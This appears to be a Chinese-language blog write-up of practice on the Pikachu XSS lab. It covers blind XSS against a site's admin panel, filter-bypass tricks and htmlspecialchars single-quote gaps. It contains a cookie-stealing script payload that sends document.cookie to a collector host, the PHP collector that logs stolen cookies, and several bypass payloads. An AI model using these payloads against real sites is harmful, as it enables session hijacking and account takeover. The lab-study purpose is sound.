XSS盲打

Posted 2020-12-20 liqik

0x00：XSS盲打

简介

 

 

 尽可能地于一切可能的地方提交XSS语句，只要后台管理员看到某一条语句，此语句就能被执行。
可以再留言板上留下获取cookie的代码，只要管理员在后台看到，就能获取管理员的cookie。

原理就是你给前台插payload，只要后台管理员浏览过，js代码已经被管理员触发，你Xss平台就会反馈给你信息。

联系平台 pikachu

 

 

 此站点是 自己接收cookie的站点

payloads

简单测试一下<script>alert(123)</script>

登陆后台测试，产生弹窗

 

 

 

 

 

 获取cookies payloads

<script>document.location=‘http://192.168.2.211/pikachu-master/pkxss/xcookie/cookie.php?cookie=‘ + document.cookie;</script>

payload的意思就是，获取当前用户cookie，并以参数的方式发送到http://192.168.2.211/pikachu-master/pkxss/xcookie/cookie.php

查看后台获取的结果，获取admin用户的cookie

 

 

 cookie.php代码：

<?php
include_once ‘../inc/config.inc.php‘;
include_once ‘../inc/mysql.inc.php‘;
$link=connect();

//这个是获取cookie的api页面

if(isset($_GET[‘cookie‘])){
    $time=date(‘Y-m-d g:i:s‘);
    $ipaddress=getenv (‘REMOTE_ADDR‘);
    $cookie=$_GET[‘cookie‘];
    $referer=$_SERVER[‘HTTP_REFERER‘];
    $useragent=$_SERVER[‘HTTP_USER_AGENT‘];
    $query="insert cookies(time,ipaddress,cookie,referer,useragent) 
    values(‘$time‘,‘$ipaddress‘,‘$cookie‘,‘$referer‘,‘$useragent‘)";
    $result=mysqli_query($link, $query);
}
header("Location:http://127.0.0.1/pikachu-master/index.php");//重定向到一个可信的网站，例如www.baidu.com

?>

 

学习链接：

https://zhuanlan.zhihu.com/p/25697201

0x01：XSS绕过

0.前端限制——抓包重放/直接F12修改前端代码
1.大小写——<SCriPt>AleRt(test)</ScRipt>
2.拼凑法——<scri<script>pt>alert(test)</scr<srcript>ipt>
3.注释干扰法——<scri<!--test-->pt>alert(test)</scr<!--test-->ipt>
4.编码法——对Payload进行html编码

0x02:htmlspecialchars()

参考：https://www.w3school.com.cn/php/func_string_htmlspecialchars.asp

https://blog.csdn.net/weixin_43716322/article/details/89480895

 

 

 

 htmlspecialchars()函数默认只编码双引号，当开发者未对单引号过滤时，就会可能导致XSS的发生(不久之前还跟别人说这个函数很厉害，能当住xss)

payload:

1‘ onclick=‘alert(1)‘

 

 

href输出

payloads:  javascript:alert(1)

 

js输出

 

 payload:

</script><script>alert(1)</script>

Done!